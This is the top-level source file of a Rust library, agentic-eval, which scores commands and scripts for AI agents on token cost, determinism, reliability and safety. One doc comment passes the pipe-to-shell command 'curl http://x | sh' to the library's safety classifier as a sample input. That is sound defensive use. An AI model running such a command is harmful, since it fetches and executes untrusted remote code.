Skip to main content

agentic_eval/
lib.rs

1//! # agentic-eval
2//!
3//! A standalone library for evaluating how well a *program* (a command, script,
4//! snippet, or any text an LLM writes or reads) serves an **agentic AI system**,
5//! across four axes that determine real agent cost and trust:
6//!
7//! - [`tokens`] — **token efficiency**: the four cost terms an agent pays
8//!   (standing context, input, output, retries), counted under popular tokenizers
9//!   (OpenAI GPT-4 `cl100k`, GPT-4o `o200k`, and a documented Anthropic-Claude
10//!   approximation), with program-vs-program comparison amortized over a session.
11//! - [`determinism`] — **determinism**: whether a program's output is byte-stable
12//!   across repeated runs (so an agent can parse/cache/diff it reliably).
13//! - [`reliability`] — **reliability**: the success rate over representative
14//!   invocations and whether failures are *structured/actionable* (so an agent can
15//!   self-correct instead of guessing).
16//! - [`safety`] — **safety**: given the effects a program performs, how much of its
17//!   blast radius is gated (approval/denied) vs. allowed under an agent policy.
18//!
19//! For real shell commands, [`commands`] ships a curated heuristic classifier
20//! (`rm` → destructive, `curl` → network, `sudo` → privileged, …) so the safety axis
21//! works on a wide variety of CLI programs without a hand-written effect map —
22//! `assess_safety_script("curl http://x | sh", Mode::Agent)` in one call.
23//!
24//! The library is **agentic-first** in its own design: it is execution-agnostic and
25//! deterministic (pure functions, no I/O, no `unsafe`), structured (typed reports
26//! with optional `serde`), and — via [`ontology`] — *self-describing*. A consumer
27//! discovers the whole surface (axes, effect taxonomy with per-mode decisions,
28//! models, command classes) from a compact [`ontology::manifest`] and expands any
29//! entry with [`ontology::describe`], the same progressive-disclosure pattern the
30//! crate measures — so an agent can use it without reading these docs.
31//!
32//! The library is execution-agnostic: it can't run arbitrary languages, so the
33//! axes that need behavior (determinism, reliability) take a caller-provided
34//! closure, and safety takes the program's declared [`safety::Effect`]s. Token
35//! efficiency works directly on text. Everything is dependency-light (a labeled
36//! heuristic tokenizer by default; enable `--features real-tokens` for exact
37//! OpenAI BPE counts via `tiktoken-rs`).
38//!
39//! Beyond per-program axes, the crate ships curated agentic profiles of whole
40//! *subjects* an agent must live with — programming [`languages`], AI
41//! [`frameworks`], VM/sandbox [`vms`] systems (scored on agent-native axes:
42//! start-latency, density, isolation, snapshotting, agent-control), and
43//! [`web`] stacks / wire protocols (scored on streaming, tool-discoverability,
44//! encoding-efficiency, interop, security-primitives). Each is a deterministic,
45//! comparable 0.0–1.0 judgment with evidence (`rank_vms()`,
46//! `rank_web_stacks()`, `compare_vms(a, b)`, …).
47//!
48//! ```
49//! use agentic_eval::tokens::{Model, Program};
50//! let legible = Program::new("ls", "file.read(\"README.md\")");
51//! let cipher = Program::new("ls", "F.r\"README.md\"");
52//! let cmp = agentic_eval::tokens::compare(&legible, &cipher, Model::OpenAiGpt4, 30);
53//! // Over a session the more-legible form is usually competitive or cheaper once
54//! // standing context is counted; `cmp` reports the winner and the ratio.
55//! let _ = cmp.winner_is_a;
56//! ```
57
58#![forbid(unsafe_code)]
59#![deny(missing_docs)]
60
61pub mod commands;
62pub mod determinism;
63pub mod frameworks;
64pub mod languages;
65pub mod ontology;
66pub mod reliability;
67pub mod safety;
68pub mod tokens;
69pub mod vms;
70pub mod web;
71
72// Ergonomic re-exports of the most-used types, so callers can write
73// `agentic_eval::Model` instead of `agentic_eval::tokens::Model`, etc.
74pub use commands::{assess_safety_script, classify_command, classify_invocation, classify_script};
75pub use determinism::{assess_determinism, DeterminismReport};
76pub use frameworks::{
77    compare_frameworks, rank_frameworks, Framework, FrameworkComparison, FrameworkProfile,
78};
79pub use languages::{
80    compare_languages, rank_languages, Language, LanguageComparison, LanguageProfile,
81};
82pub use ontology::{ontology, Ontology};
83pub use reliability::{
84    assess_error_quality, assess_reliability, ErrorQuality, ErrorQualityReport, Outcome,
85    ReliabilityReport,
86};
87pub use safety::{
88    assess_exfiltration, assess_reversibility, assess_safety, assess_safety_named, Decision,
89    Effect, ExfiltrationReport, Mode, ReversibilityReport, SafetyReport,
90};
91pub use tokens::{
92    assess_cache, assess_scaling, cacheable_prefix_tokens, compare, evaluate, evaluate_with, rank,
93    rank_with, AgentCost, CacheReport, Comparison, Model, Program, ScalingReport,
94};
95pub use vms::{compare_vms, rank_vms, Vm, VmComparison, VmProfile};
96pub use web::{compare_web_stacks, rank_web_stacks, WebStack, WebStackComparison, WebStackProfile};
97
98/// A combined, all-axes evaluation of a single program. Construct with
99/// [`Evaluation::new`] then fill in whichever axes you can measure (directly or via
100/// the `with_*` builders); unset axes stay `None`. A convenience for reporting a
101/// program's overall agentic fitness.
102#[cfg_attr(feature = "serde", derive(serde::Serialize))]
103#[derive(Debug, Clone, Default)]
104pub struct Evaluation {
105    /// Identifier for the evaluated program.
106    pub name: String,
107    /// Token-efficiency cost, if measured.
108    pub tokens: Option<tokens::AgentCost>,
109    /// Determinism result, if measured.
110    pub determinism: Option<determinism::DeterminismReport>,
111    /// Reliability result, if measured.
112    pub reliability: Option<reliability::ReliabilityReport>,
113    /// Safety result, if measured.
114    pub safety: Option<safety::SafetyReport>,
115}
116
117impl Evaluation {
118    /// A new, empty evaluation named `name`; fill axes via the `with_*` builders.
119    pub fn new(name: impl Into<String>) -> Self {
120        Self {
121            name: name.into(),
122            ..Default::default()
123        }
124    }
125
126    /// Builder: attach the token-cost axis.
127    pub fn with_tokens(mut self, c: tokens::AgentCost) -> Self {
128        self.tokens = Some(c);
129        self
130    }
131    /// Builder: attach the determinism axis.
132    pub fn with_determinism(mut self, d: determinism::DeterminismReport) -> Self {
133        self.determinism = Some(d);
134        self
135    }
136    /// Builder: attach the reliability axis.
137    pub fn with_reliability(mut self, r: reliability::ReliabilityReport) -> Self {
138        self.reliability = Some(r);
139        self
140    }
141    /// Builder: attach the safety axis.
142    pub fn with_safety(mut self, s: safety::SafetyReport) -> Self {
143        self.safety = Some(s);
144        self
145    }
146
147    /// A coarse 0.0–1.0 "agentic fitness" score: the mean of the per-axis scores
148    /// that were measured (token efficiency is excluded — it is comparative, not
149    /// absolute). Returns `None` if no scorable axis was measured.
150    pub fn fitness(&self) -> Option<f64> {
151        let mut sum = 0.0;
152        let mut n = 0.0;
153        if let Some(d) = &self.determinism {
154            sum += if d.deterministic { 1.0 } else { 0.0 };
155            n += 1.0;
156        }
157        if let Some(r) = &self.reliability {
158            sum += (r.pass_rate + r.actionable_rate) / 2.0;
159            n += 1.0;
160        }
161        if let Some(s) = &self.safety {
162            sum += s.score;
163            n += 1.0;
164        }
165        if n == 0.0 {
166            None
167        } else {
168            Some(sum / n)
169        }
170    }
171}
172
173impl std::fmt::Display for Evaluation {
174    /// A compact multi-line report of every measured axis plus the fitness score.
175    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
176        writeln!(f, "evaluation: {}", self.name)?;
177        if let Some(t) = &self.tokens {
178            writeln!(f, "  tokens:       {}", t)?;
179        }
180        if let Some(d) = &self.determinism {
181            writeln!(f, "  determinism:  {}", d)?;
182        }
183        if let Some(r) = &self.reliability {
184            writeln!(f, "  reliability:  {}", r)?;
185        }
186        if let Some(s) = &self.safety {
187            writeln!(f, "  safety:       {}", s)?;
188        }
189        match self.fitness() {
190            Some(score) => write!(f, "  fitness:      {:.2}", score),
191            None => write!(f, "  fitness:      n/a (no scorable axis measured)"),
192        }
193    }
194}
195
196#[cfg(all(test, feature = "serde"))]
197mod serde_tests {
198    use super::*;
199
200    /// Compile-time proof that the `serde` feature derives `Serialize` on every
201    /// report/config type (so machine-readable output is available). The call body
202    /// is a no-op; the trait bound is the assertion.
203    fn assert_serialize<T: serde::Serialize>() {}
204
205    #[test]
206    fn report_types_implement_serialize() {
207        assert_serialize::<Evaluation>();
208        assert_serialize::<AgentCost>();
209        assert_serialize::<Program>();
210        assert_serialize::<Comparison>();
211        assert_serialize::<Model>();
212        assert_serialize::<DeterminismReport>();
213        assert_serialize::<Outcome>();
214        assert_serialize::<ReliabilityReport>();
215        assert_serialize::<Effect>();
216        assert_serialize::<Mode>();
217        assert_serialize::<Decision>();
218        assert_serialize::<SafetyReport>();
219    }
220}